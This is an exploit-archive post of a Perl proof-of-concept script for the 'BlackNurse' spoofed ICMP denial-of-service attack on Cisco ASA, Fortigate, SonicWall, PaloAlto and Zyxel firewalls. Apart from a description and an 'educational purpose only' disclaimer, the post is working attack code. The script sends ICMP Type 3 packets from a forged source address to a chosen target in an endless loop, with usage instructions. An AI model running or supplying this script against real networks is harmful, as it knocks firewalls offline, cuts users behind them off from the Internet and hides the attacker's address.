BlackNurse Spoofed ICMP Denial Of Service Proof Of Concept
Posted on 15 November 2016
#!/usr/bin/perl # # Cisco ASA 5515/5525/5550/5515-X | Fotinet | # Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | # Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC # # Copyright 2016 (c) Todor Donev # Varna, Bulgaria # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # http://pastebin.com/u/hackerscommunity # # # Description: # Blacknurse is a low bandwidth ICMP attack that is capable of doing denial # of service to well known firewalls. Most ICMP attacks that we see are based # on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based # on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP # Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly # effective even at low bandwidth. Low bandwidth is in this case around 15-18 # Mbit/s. This is to achieve the volume of packets needed which is around 40 to # 50K packets per second. It does not matter if you have a 1 Gbit/s Internet # connection. The impact we see on different firewalls is typically high CPU # loads. When an attack is ongoing, users from the LAN side will no longer be # able to send/receive traffic to/from the Internet. All firewalls we have seen # recover when the attack stops. # # Disclaimer: # This or previous program is for Educational purpose ONLY. Do not # use it without permission. The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # Thanks to Maya (Maiya|Mia) Hristova and all my friends # that support me. # # use Net::RawIP; print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC "; print "[ ====== "; print "[ Usg: $0 <spoofed address> <target> "; print "[ Example: perl $0 133.71.33.7 192.168.1.1 "; print "[ ====== "; print "[ <todor.donev@gmail.com> Todor Donev "; print "[ Facebook: https://www.facebook.com/ethicalhackerorg "; print "[ Website: https://www.ethical-hacker.org/ "; my $spoof = $ARGV[0]; my $target = $ARGV[1]; my $sock = new Net::RawIP({ icmp => {} }) or die; print "[ Sending crafted packets.. "; while () { $sock->set({ ip => { saddr => $spoof, daddr => $target}, icmp => { type => 3, code => 3} }); $sock->send; $sock->set({ icmp => { type=>3, code => 0}}); $sock->send; $sock->set({ icmp => { type=>3, code => 1}}); $sock->send; $sock->set({ icmp => { type=>3, code => 2}}); $sock->send; }